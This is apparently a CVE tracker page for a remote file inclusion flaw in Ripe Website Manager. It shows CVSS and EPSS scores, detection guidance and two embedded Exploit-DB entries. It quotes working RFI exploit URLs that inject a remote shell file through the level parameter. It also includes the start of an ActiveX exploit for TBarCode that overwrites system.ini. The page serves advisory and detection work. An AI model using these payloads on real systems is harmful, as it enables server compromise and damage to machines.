CVE-2007-3524
published 2007-07-03CVE-2007-3524: Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in…
PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
64.20%
99.1th percentile
Multiple PHP remote file inclusion vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the level parameter to (1) admin/includes/author_panel_header.php or (2) admin/includes/admin_header.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ripe_website_manager | ripe_website_manager | <= 0.8.9 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting the `level` parameter in the two vulnerable PHP scripts for values containing a URL (remote file inclusion pattern), particularly those ending with `?` to nullify the appended extension. ↗
- →The RFI payload appends a trailing `?` to the injected URL (e.g., `level=shell.txt?`) to neutralise any suffix appended by the include statement — look for this pattern in web server logs. ↗
- ·Vulnerability affects Ripe Website Manager version 0.8.9 and earlier only; verify the installed version before applying detection rules to avoid false positives on patched installations. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion
exploitdb·2007-06-30
CVE-2007-3524 Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion
Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion
---
#Author:: BlackNDoor | [email protected]
#Homepage:: www.learntohell.net
#
#Script:: Ripe Wepsite Manager
#Version:: Files:
/admin/includes/author_panel_header.php
/admin/includes/admin_header.php
-> vulncode:
#Exploit::
http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]
Exploit-DB
TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite
exploitdb·2007-06-12
CVE-2007-3233 TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite
TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite
---
TEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) "SaveImage()" Remote Arbitrary File Overwrite
url: http://www.tec-it.com/asp/main/startfr.asp?LN=1
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
Sub tryMe
On Error Resume Next
Dim MyMsg
If(MsgBox("This was written for educational purpos
No writeups or analysis indexed.
http://osvdb.org/37799http://osvdb.org/37800http://secunia.com/advisories/25898http://www.securityfocus.com/bid/24722http://www.vupen.com/english/advisories/2007/2407https://exchange.xforce.ibmcloud.com/vulnerabilities/35188https://www.exploit-db.com/exploits/4129http://osvdb.org/37799http://osvdb.org/37800http://secunia.com/advisories/25898http://www.securityfocus.com/bid/24722http://www.vupen.com/english/advisories/2007/2407https://exchange.xforce.ibmcloud.com/vulnerabilities/35188https://www.exploit-db.com/exploits/4129
2007-07-03
Published